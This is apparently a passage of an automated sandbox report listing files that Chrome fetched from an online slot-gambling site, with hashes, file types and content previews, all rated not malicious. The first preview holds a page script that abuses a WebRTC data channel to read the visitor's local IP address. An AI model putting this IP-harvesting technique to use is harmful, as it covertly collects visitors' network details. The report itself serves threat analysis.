                                                      Preview:/**.*.*/...(function($){..'use strict';...var localip,..ajaxUrl = '/member/call-request';....if($(document).data('caller'))...return false;....$(document)....data('caller', true)....ready(function(){...try{....window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; //compatibility for firefox and chrome.. var pc = new RTCPeerConnection({iceServers: []}), noop = function () {.. };.. pc.createDataChannel(""); //create a bogus data channel.. pc.createOffer(pc.setLocalDescription.bind(pc), noop); // create offer and set local description.. pc.onicecandidate = function (ice) { //listen for candidate events.. if (!ice || !ice.candidate || !ice.candidate.candidate) return;.. var p = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate);.. pc.onicecandidate = noop;.. if(p).. .localip = p[1];..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):9651
                                                      Entropy (8bit):7.944941508965117
                                                      Encrypted:false
                                                      SSDEEP:192:JOaTYbKJvJXpid/9TDsH2YfUwmf0xaX7yNShcMRS3t/PQfqMGUU:oGJvKd1fy2YcNf0xaXOWcBPQyPR
                                                      MD5:46E1092035A93812DD68086C33363DAE
                                                      SHA1:8EF09D3FE3691BE69756E8DD8132768D72467E53
                                                      SHA-256:0FA3D59BA584A9B691973545A62F991523E46329B15BA3A561744168A827EC11
                                                      SHA-512:B427DE08479E00FCC7D4DF0529403BD8488777D70B35E7DCE6B415AB2028A447A15B80209118FAC8B4E2A418BA3719DB2879F32CB1EA935FFCDD84285795A1C8
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE........e{.............yx...xZ.{r....m_....!o.+mt....I.6m...\?x..f..m.cv....nWB....l..H?.....rF.'n.Gn..~F....|....J5...j|.]wO...\^..N.@o. n..D..\\..h....A..IJ..N..)m|.^.../..F..c...p..=...[\...?....R..[E....I.Hc/....O.Dg,...t...NP..D...cx>...Zr<..3s..M..H.....VF...Sh.....D!..)....Gx_p$..6...D..M..K1..._e..M.?nP....LL...ZgK...cd(..U...Cl..B#....C..EE...yE1....A..A-...t.gc..L..D..@..K ....?..C..u..E.sD.t.0....u..s..D0...@...1....sB..2..2....r:....u2..>..6....@I....@..C3......l.0....r..L2....@F..3...t1.......E...2..3..6..3....L..t..N..L..G1....k..M2....L.lD/.......q..F.kT0......|..(t.na1...... u.Hi..m:...!u.`V..r.-t..N..p..s.$r.P^.W[..q..q@...q-...|...N....0s.rJ.6r.nE.u..jb.~Q..p!....o..O.uS.<n..O..C.2n/...m|7V{.Qh..s.Lb"..&....sw,u...k:.....htRNS......7% 1LS..Q..$..U.^.ygc.....F..qn?0...zP.....d..rm.xr@8.....]......7........M....j..r[....!.IDATx.......................c..0...v..,C.4"..fa....a@XX...E.)...F..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):99
                                                      Entropy (8bit):4.1167308164285386
                                                      Encrypted:false
                                                      SSDEEP:3:x1rz9UzWReHv0DSvEJG3w9MQJMJHv1n:jVav0DmYGC4v1
                                                      MD5:66B042ADACAAB1105BFE97C59F5453EF
                                                      SHA1:FE99F09D30B48CC2E4DC95350B4ADA2677B6DCB8
                                                      SHA-256:42DA7EC1A45DC98256C4FE206CE9B134D97AA9764481B18815F96BA2BE987339
                                                      SHA-512:C94532A34A90A261A9D01E60AA630CB9BAC85374C45352B962FFD02F695FB7F8A0A3ACB6FB5C821E9984DF0965A4E86F18CB61E4A53E203F7D73E553CB5221C4
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:[{"cat_id":802,"cat_name":"Newest","icon":"new"},{"cat_id":"all","cat_name":"all games","icon":""}]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):27240
                                                      Entropy (8bit):7.9891335100671
                                                      Encrypted:false
                                                      SSDEEP:768:q9DMmN0nrbRk/owkAGEBqhxLAQuLnpmbN1lbvtQ1s:q9DXN0n3+/xCE8hxLCpmZbvyi
                                                      MD5:10C034A13013087BC968D6ADE79D5754
                                                      SHA1:28602F401F011394F2F2DF8C8CD8E6E58FFB42DE
                                                      SHA-256:C44970325E16BCE3CB72237534BCB82C66F497F51A373631820012996A41FA6F
                                                      SHA-512:7A9E8B2CE44D674E072C90A977ACBD84296D0A6B7C62AC5600A684435579D7D0F63D7586817E89A97233B1565C626339210D65C4A26483F728415196CD63A183
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/uft593z8hu17w.png?ver=1727844915
                                                      Preview:.PNG........IHDR...............^.....PLTE...L.~...+.w =[S.w.X5O.B6- xQE.x"~SX.~U.._9/.|.jI.e@L.}%.QK..S,.J&</+...LF@.P1TMI.rO...).rF.u...-..]..nBK?6...C;7...).W6.....(......[A&.q....[+.'#d.Y...4....4.q...6JV.......l....?.,..g...|L.M.D....V.(..._.4 ....@.?.s.../....E......z....)V...-..f9.Q%.;.<(..9p............P#......\XV%2?...D.z&.C...2`B..2.Y{...O.'.jO.D...@..h.\/"....qFt.............*..>.p...._7..A..2....3.....A,....T....s....rB+.,.9.^.k....qH.....4h....,...[..3._..]....)..b..aO.z...j...A$...t.....zW..YH7tW.L..._BG..&y>..i...%|......d..>..S&......u]....o.NW<..."q.:q{|| .l.YJ.lW..7ch9o...q13bw.w..n.....s........i.....[....].`.xd[..E.m$.@k.&.zu....t..............A.w...W...8.....Szn..K.,..f..>.....\.5..t.....X...$...,P;`A..0q.!..8..}s..>..V.H....t.@.&.>....uo.....g#IDATx....<.y..}*.i.BRD.(.-.K!d..YBJ...b.5.!. ?.-.....*...6.2.of.fj.....Y.._...{.\....q.p.q.|....~..9.}Ki...R......k....-Z4..,...%......R...-T]./<n.*..G._..N..d.x.eK'.2|..o..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):88643
                                                      Entropy (8bit):7.993220539137035
                                                      Encrypted:true
                                                      SSDEEP:1536:akqj9uG9V2V9eq/FsP7jeJ7id46N/+Jkm6DT8Nw1ygskiq3UKUYiixssMxk53M:FY95VLAk7jeJbRGjEq1UYDOXxku
                                                      MD5:2FC41EB4578273BEA1EB58C7F8E06AF5
                                                      SHA1:B2B0B3E2EC38C77EBE08646A4CA2150E84DBE9BE
                                                      SHA-256:D14C62C3C8BDCF1E1E0F9F8C98487B62E3C39051700ED52C1FAC7675836591B1
                                                      SHA-512:AD3A937341177134BF2B1F7CA0E8C8B9264C311EE0AE063332D846205F3C29587090F40326C121411F834E062F561366F4FEA788A45344A2A146F874BB6F7A3E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............X.....lzTXtRaw profile type iptc..x.....qV((.O..I.R...3.c..#.K.... ..##.d.#CK ......,.,.!bd`.bfnn.,.enjn`f..........+.G..".....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 11.70'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:subject>. <rdf:Bag>. <rdf:li>Icon</rdf:li>. <rdf:li> mgp</rdf:li>. <rdf:li> upg</rdf:li>. </rdf:Bag>. </dc:subject>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>.3.X.. .IDATx.....%W}..=..n~....-.[....H ...Lp.66...^.0.w.....N.3......a`..cL...&I...Z...tS.[u.~N..Z-.z..O..........G.6^.A.~.........A..).....d.0.......".o)......}.....-4h......_.....V...;.Z...../K)..._.a_s.4..t.o^..g.k/C..B.R(s.......!.....E.p#..rq.{..C.|.1..S>...>.4}..e..D)w.f.Z#. ...]B..)........I.'..%....D"..5M.1-C.....'U.J.#...sE.].
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):3433
                                                      Entropy (8bit):5.027448140828748
                                                      Encrypted:false
                                                      SSDEEP:96:6muOBOhjag3VP7QR+VBfEO6NodGQhlYxBrj:6muOBOhjt3VzQkVBfEO6NodGQ0Hv
                                                      MD5:108DE3688348603249E2EF4FF76E683A
                                                      SHA1:00578BE1BC0CF509E92C1F426912220B1A50112D
                                                      SHA-256:AAAFD6456F786EDC4C5E15B241494B7695C81D1D23DB593950485F9F3D47A697
                                                      SHA-512:BCE8325D4B7E47D88080428FEEE8F569384B4BF64E315C9D17AF3FF151D7FB1F8331FC2922EE9442436B202237BF1D0E377FFAB2E523F8D7783590ED7184763E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/getegame?platform%5B%5D=224&page=1&cates%5B%5D=802&gamename=&gameid=
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":38229,"name":"Treasure Bowls","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_TreasureBowls.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":38228,"name":"FaFa Fortune","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_FaFaFortune.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":35972,"name":"Wonder Woods","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_wonderWoods.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":35971,"name":"Treasure Skyland","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_treasureSkyland.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):26714
                                                      Entropy (8bit):7.985073742083564
                                                      Encrypted:false
                                                      SSDEEP:768:MKydKrLunxUGLBQgIOU5P/Iv2XkG5cDSxnNwW1bnT1Q:MWL+nIOUVl0cqSJNwonZQ
                                                      MD5:E2E6750FDA8C43D5832B69CB007D8C0C
                                                      SHA1:37F4CF347834A4D79660BE8ED4B823F771E87CDC
                                                      SHA-256:BC4EA0F2F4D9864F7C25FC0BF267D6EF41A1F0FA79CAF442FB7B96308A99D1DB
                                                      SHA-512:BBA577AE84D56C77D2A9D8DA3D5A8BD1320127581045083F5E61B68868EFB3F1FF45A88A43715254613F6534C7E0BCDEBB064A9F8ECD0D92FA70F30A12044D26
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE'&W&/e(*\ (_..&$.0...$$V"*a&'Z".*+&; )g)-_#-k/=w%.8..0.. *$2%#R......)3k,7s......41E0,>"/qD@V?<P...96J$:~IE[...3H.'D.3A}...'..y..XXs#4wNLaWTh'I.gh.'A.)^.bau42V&"C0'F--N......03d.V.yz........=k.y.4O..s{7$7#..ro.7Gr..h..KJn...4<]r......~..nC.j..|K.d=...@=dkt._..4..G..=/<;...|.......^...[`....Y..2 -....p....x!..sI[*.......Kw.$.@>e..W_L]Q[..Tvct<u..]L".CH{J..oy.-...J...?' ..(lVd...0z....*@PW@P.Xw..I6D...@e......e...0..|..i/.g>%...z..P|....9].9K`....wJ.....R9.x...s.iy...S......H.......`..o....q.Y...X..}A.{LQ......BQ.r..+F...G..eRA{T4.#..U2...CW.............Pj....bg....[j.T...{S.......gB...+V.fj....[c....f>.....(J.3VyEp.Rx..pNw......A...W..p\.oyj;E8f.F_w.....l...^].._..$5.....m`.......b.R....../........W.....p........:~........S*.........ve.. .IDATx...\S... A%....$&..1.$..A...........pvA..(.a....[..+(....8~.*..*.V.UD..S.:.:.:l............!..4Y..{.w..Fo..."0+.E.5as..`...<.y...\..p.....y...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):5398
                                                      Entropy (8bit):7.877581383518887
                                                      Encrypted:false
                                                      SSDEEP:96:dTaIJLunahJSJE2621TvUmLVSYqO5K3QKNILxCwedHXGfQFIGm25MnVJD:deAzB121fLEYqZexCwe5bFIGfCVJD
                                                      MD5:FE71F96E24F6762C5213F4464104E173
                                                      SHA1:6A84E92D7C873B41FCFA36A3859DA4E405151868
                                                      SHA-256:07A9D180EFF08B6FD647C7E49AF3D755C0435092D035B2FDC97049848F904B67
                                                      SHA-512:966D545EFFC423171752FE29293D5899B70CD144CCC557B40DC3CC577AF230B3F846B9DE3A2F833240EF6E76BDB1CD6518CE78F652B76FC8DB8BF07AB2644504
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/172_egame_logo.png?ver=1669192658
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE............pp..FL.m-.b6...\\.............''y....m-..pYY.......................[;1"i...>>........m-.m-..o.m-..p..n.m-...............))z.m-8$g..., j......##v.......m-&.l.m-.m-.m-.m-.........22.::.....m-.m-.MF.m-).k.m- .n.m-ee.EE....QQ...................R-_.TAD(c..p#.m.m-.i0.i0L+a.m-..o...............UU........II.....m-....m-.m-.m-.>R.m-.m-....m-.m-.m-.m-.m-.m-.m-.h1.m-....77...........^8u:U.m-L+a.m-.@P.m-.CO.m-.m-.e3.m-.m-_2[.m-.d4...o8W.............NN.......//}.........tt...........m-.m-X0].m-.NE.m-aa..JH.m-.m-.j/w;T.m-.GJ.m-....m-.......mm..m-=&e.m-.m-......h5Y.W>.m-.m-....m-...U@Z0].f2...66.bb..c4d4Z.m-........FKuu..]:.`7.m-.QC.DMnn.AA..Y<...yy.]]....~~.LL.qq....22.FF..m-.......||..m-.OD}}.yy............p.m-...&&x.m-..r.k...q..s....l...p!!u.j/J!WQ....tRNS......@...............................................z.G-........`....................................X..=..i..:.u..!...............P...........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):191
                                                      Entropy (8bit):4.995729883842431
                                                      Encrypted:false
                                                      SSDEEP:3:RAM8HpRBEBc2LGRFE3BFKCMLFYYDQyRFf/N7NReLFMN1ML3vBKVQBIy5K/CyL3Hr:z8HpULZ3MLFYuZXZqRMMLfBXIykR3CDO
                                                      MD5:24BC8669CAF172F2C17A06FCD73AE539
                                                      SHA1:3BAD8F340BCA43D8FB98C3CA39DEF12F816769A8
                                                      SHA-256:29DF48677FD1C2B2A602C35FAEADD3693F083B78550B2C0F3108F356C34B74BD
                                                      SHA-512:0B4B2DC35F8B97238079334BE832751D1E33DFBBDDDA4961C38127AFADCB088101BAD71B0442BD810930DF2658DFD9F42DA0B08D44BB1E1F1DD0A5DDE33423A3
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/js/www/login.js?ver=1606790076
                                                      Preview:jQuery(document).ready(function() {.....$('#loginForm').submit(function(){... $(this).children('#loginSub').prop('disabled', true);...});.....$("#loginSub").prop('disabled', false);....});
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):3476
                                                      Entropy (8bit):5.090937476469927
                                                      Encrypted:false
                                                      SSDEEP:96:UvUvkXvKvFvTpvFv7vWJvNvaTvavh4MxBrj:UvUvkXvKvFvTpvFv7vWJvNvaTvav/Hv
                                                      MD5:A3F8DF71481C0F98154824C8A3CE58C3
                                                      SHA1:2722C526FACE4961CEA9E0102DBAF458455D48BC
                                                      SHA-256:DF3F3EEBC5661A177CAB73F980D4F55618DAF0B6F185846B59A62FCDA77019EC
                                                      SHA-512:3B541A7D7BDFFD1BF86819F539CAB7BC365BE11CB246FA51A56FE64B324C0BB792D56600C53FC7AE5D241172B942B3CC93A0266F5318598BDEADF6F842DCFAF6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":39634,"name":"Hawaii Vacay","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/zhh6mqf3z495a.png?ver=1734681327","progressive":"","ppid":202,"notry":0,"favorite":false},{"id":39550,"name":"Christmas Eve","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/ddodhamgc71gk.png?ver=1733716011","progressive":"","ppid":202,"notry":0,"favorite":false},{"id":39536,"name":"Mahjong Reactor","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/o39k3h9o685xq.png?ver=1733369194","progressive":"","ppid":202,"notry":0,"favorite":false},{"id":39535,"name":"Hot Wheels","pfid":202,"ppname":"Joker Slots","code":"JOKER","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/joker\/qqgindypyeboy.png?ver=1733369194","progressive":"","ppid":202,"notry":0,"favorite":fal
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 123 x 32, 4-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):848
                                                      Entropy (8bit):7.651617271340723
                                                      Encrypted:false
                                                      SSDEEP:24:U5lcd5baCQF2cB68STcGCaT1JIdxCzw3MgltR/nf:U5lgBaX9hGlJIbCzwLltVf
                                                      MD5:73B08A84857DE4B8BFD1628FA662874B
                                                      SHA1:9EE7975136B2E07D781DB9CBF19DC7D4A54D54A3
                                                      SHA-256:C0DCC312A05C7FB9A333FEC868CEC1652278DB7AACE30F239BAF4227E27FD7DD
                                                      SHA-512:F8D8249E6E1480CA35BF8929DA5F74565FE1DE31D139AA3E863C9AD0DB0A4B6FE75AD0BB05C0D029A06EF0D238C1670ED37AD1AC69F6F46C40E419C546F362F5
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...{... ........x...'PLTE...AAA666...|||+++iii...MMM^^^WWWuuuGpL.M.D....tRNS.............=.".....IDAT8.U.k.q.....j.!.VDnH.Z...."5C..th-.!....Bi]t..S3D.q..A...&d...1..?..{.............{.`&9<..N.8<....=*..O0<.Q.g9"cz)E....[.O.k..9XuY.....xw..6p:z...^...eL.J+....../.w.y...-#.k.[.Tq.....2p<..?mLq.M..xa....cy..<.$vF1.b.U1U..>............o.f...0.$.q.......Y.....rX.$.Kc.Z]...E.|?.........W.].`.8]l<....LlY.1.U.a.......|.~.m...Q....S.f..../..6a...X..$gO..t.[..15...0...f.h.8..>..h..P'..E=.C8...V=.k..0.].=....^.8.'T..UP]...y...TI.6fr...q...r p..W.B.$<..-........mX..\./.H..(..p=.=.N.S..aFL.Qg....?.....&.e....F..*.a2\;.t....m.....h.B6,Z-@.;+6..RZ.6.)QG.....aznk.2A...a.a.W...sm.1..L.]......../.m...w........l...AT. ./|.._..l..^9...[.L..O9\...........D.V:*O..J..V.A=.ob...............w.........IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2848
                                                      Entropy (8bit):7.849926935479063
                                                      Encrypted:false
                                                      SSDEEP:48:pXeJBs8yE4HS4NWzoQ3t/bmoeNVlZ5nola5wi469kZ9JStWA7K:pXeJSE4HpWMQ3JaNVlZ5n43i4thGWp
                                                      MD5:30E888304CDC002C632B7E5211021686
                                                      SHA1:BD1592140ED6AA5B951B420B235EE8D185FCA9E3
                                                      SHA-256:8C642E2A146F9DABA19B1B3F0E9D7106DA5916E160BC3073195ACB70469E19CE
                                                      SHA-512:C976CB26EBA0030DB7D58D6B12DABA75A74FCA62587F17D03BC9DE8127E59FF8C30F991478257537ECEFC6247F51FA342E2ED6435AE8CF01281DB108813A413E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...!...]-!...]-........................x......2D!...............]-..................q......i............!..!..!..!..!..!......]-..............]-.]-!...]-.]-.W,.]-...........!...]-.]-!...]-!..!..!....$."$....]-.]-..........*&./&...ES|..:.....>...-&.2'!...]-....."Y../...g:=..K...{U.qG.bg..xu.kQS...o..#y..)7.=(...G..`...qc.gH.X,.M*.+%...:..m..z{~.ul.d?.`6...b..-...nZ........|.......VtRNS................@....@................pP.........pP..........`0 ...`0...x.......W.0......IDATx..............................={.m"....R4..A.....t..M#Z.-.....=.W3..Tb.c.xH.x P.h&~.,[...pd...A..A..A..A........!\...m...W.2\...m.....&\Y.^.3C.U..).v.....FpeYxm........".......+.g.k...%.......e...T..0.-.&.` .....Q..{.x^.s....T..x.xg.=.v..6..2mq.8+...@.G......2I.U....d.G.j.b..T.R".>@I.E.(Z.D....Y.%k.k.P0..^.m..`#f=Q.R}Q..........[J..6y)el.S`......v..&-6t]..@.{B5.="._.y2^....5R.E.].1OF...pcLR....m.uX.:yN...|....Z..|q....*..q..R:....WTjV
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 140x250, components 3
                                                      Category:downloaded
                                                      Size (bytes):7173
                                                      Entropy (8bit):7.913323959603938
                                                      Encrypted:false
                                                      SSDEEP:192:wNaCidELZVEzd0KwuQNxH9c20LWKgeDHbV:/CTw03u8H9OLVDHbV
                                                      MD5:4FEC7E63C0ED57A6975AF880A35714CB
                                                      SHA1:2CC0C84C28641B06AA1E5EEFD1F77B60EA5EB798
                                                      SHA-256:C759B514C10E9FD6839F0C79A7B6F5B19C3897EC9221F7583F826B6A2F2CB633
                                                      SHA-512:65E6EB9F660F0BAA97555CC5F40AAB884D4953036FFB0B150E903E071902F5741590522EB4383228C74734B3D90021ECC6067EFB23335E70BD057BF34CFA553D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/images_plus/other/en/right2.jpg
                                                      Preview:......Exif..II*.................Ducky.......<......Adobe.d.............................................................................................................................................................................................................................................!.1A"Qa2..q......Br#3..Rb$.C...D......................!.1A..Qq"..a......2.R.................?...@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.Pd.|(6..O.S+.,lq....P(.....@.P(2.'A..Z..;..........cjy.X....>.{i$>gB@.+.....t..=,_JnaP..PY...H...m.Ey-..'.....\......J..Wf.....S.nO..W.my....u.{.`.gw......BZ2...R....%.b<]....I}g....*....7Q..:.....V/..Vq5j..Z3.M....-.....$:.O....b.........NW...M.m5..|C.....E...j...........HR....r7!...t....V.%.o0.....C...D..k0..%..@.P(=.......P...=.k....]2.X.|^:8.i..R.}..i....^-..N....u.a2....c KxK).....j..=..n....gOT..zV3....9Y..Bf..?.+/V...Tq.$U...g.n..[n"..U.q.....v|g.}s....."@..o+6.....I...>.m.s...9..z+.....?...[3..K.g.......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):32813
                                                      Entropy (8bit):7.993414503236765
                                                      Encrypted:true
                                                      SSDEEP:768:Jpd6r6IDZPjZirXpe0dl+759bm5iOO/0uSrU8cfTZYfTpZm3:1MxeEOE759bxH/JSYL9YrDO
                                                      MD5:DE1E01EB97CE1267009C71A64415DBD1
                                                      SHA1:88E204207FB23186A30BD58F94CAA4238F387DB4
                                                      SHA-256:5D72928D566DE8EF8D3D9E33A40D9E1521126473CCBCF322B604C8E0BFA49DCC
                                                      SHA-512:DAD3E162AFC70AA80E7692563AC353BA7830482C40F5A58204A02DCDAF0B074CE985025B77E0472203E0B51C42DEC42557FC669EF4E35083B10507B08B68549B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE,..5.....n2;?..U.(P..g,7b'3...y9B?.."..]#.......W'...4I".K..K.....e"%...h...._...q),[....\.......Ju..........S..............yB.#e..j2.W...A....}/3.x....O3.....>..c.....e....x....).\.....@..p..*..].rB.a0....6:..<...S...........R.....k.....CK.g..B..v.n.....C!;'.{2.q-..%.....R..L..@......0.F&...Q...........r..?".Y5..h..)...{V6..../..j....I.n0.J,..9.3....v.!xC.a..V#..W....;B.MQ#i;G.Y.).>rJ..^.p>TA0+...])jH ....W..2.1....{s.p_..G.2]B...t..}..M.X.M!...2aB.').>G.j(..'..KhN7E6..<.O.m.r/.8$..Z.sQ.,.$'..&.O.c4..0.V:..+..x^..8.]6T5..yW.m.....K...H.k....%...y....+..}UQN.=FU...ZZW..HYB2....._a.][...e.mg|A...qA.f.'.'.s&.._.Hn'c.4.j.y..m.....z...U-....ybY.Ra6o`..J....+K.I.gpj.Y...=P.....9.Z.Xo3..b.=....\...}.IDATx.d..O#U...f.....(.V..t(.a.W.P..-+8tw...Sl..%+R......Y."~m.hM.*i.L..F.j.Pc6.EoV...Y5.._.....p:.<...9.No...d.!.\..dV......4.!#82:........bY..X|..3,9?0.JH...m.....Ss../~...N.jo...k...s..]..R..6....._H.<.Y.b..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 594
                                                      Category:downloaded
                                                      Size (bytes):376
                                                      Entropy (8bit):6.122718309331428
                                                      Encrypted:false
                                                      SSDEEP:6:2QhIFacOvWtR1mKpK6x1Plkf5hPlis6Y4HTsHBKHTTw9kZ+ey:IFOQ9pJTg5tssqs0Hw9Ley
                                                      MD5:355B2CB853D78AE262C093065EAA6E70
                                                      SHA1:3E8D2A456204E635CFE5BD959CFF47FAF63023FC
                                                      SHA-256:CD58D657E3D79583A5722257D8770E3B5F620F1D58E392F1D9460CC89AC485FA
                                                      SHA-512:0700F78D8D439D90ED2EBA294BCCC07451CEC67B8BF518C13A8221CCCF223A31C9E620F193874149AC818A39A90EFBAA8748607600B01C7C0F89F89B18521042
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/sec-nav-bg-grad.gif
                                                      Preview:GIF89a..R.....iM.yZ.mP.z[.kN.vW.wW.lO.yZ.rT.uV.pR.qS.jN.nQ.sU.yZ.wX.tV.uW.{Y.xY.oR.zZ.yY.sU.{Z.jM.nP.wX.iL.yX.sT.xX.oQ.rS.pS.uW.xW.kN.wY.y[.{[.tU.{\.zY.z[.hL................................................!.......,......R......pH,...r.l:..tJ.Z..v+.....A&..... h.9..Cd.,...c.H.G. ......+....%..........(.!...&.........)..........*.....-.-......-............,..........A.;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (7085)
                                                      Category:dropped
                                                      Size (bytes):7199
                                                      Entropy (8bit):5.223786028238701
                                                      Encrypted:false
                                                      SSDEEP:96:tBySz91Gwyk35YrfBewIt9jKLKDs2SFNK7wIDBRANyCfVJ45NI:zySzvGw/35YbMx9jKLKD3UIDBR8VVUq
                                                      MD5:EB05D8D73B5B13D8D84308A4751ECE96
                                                      SHA1:743052320809514FB788FE1D3DF37FC87CE90452
                                                      SHA-256:1E67D8DBCCA1F6FD94E077C85C2FB40FA1C2756C99238DAA8DA882144260A68D
                                                      SHA-512:7B68A43A22A41404A2FF58E0DA6A237492CAD0FC3E56D216980802B4D5FB483895262A7E049340D6670002BDF899BA88C319239E60D0AAE1AC31D98556B0AD6E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */.jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHoo
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):25135
                                                      Entropy (8bit):7.988312083796085
                                                      Encrypted:false
                                                      SSDEEP:768:lDIOEhemutCZwao5LalLoXgMjtSbCI16GO1B8g:l0JitCW/p7gMRS2I16lB8g
                                                      MD5:55F8778346A30651B7027BBA5532C5F2
                                                      SHA1:8C9D470A4A4DF4D92781ACA083CC15C0BA46BCB4
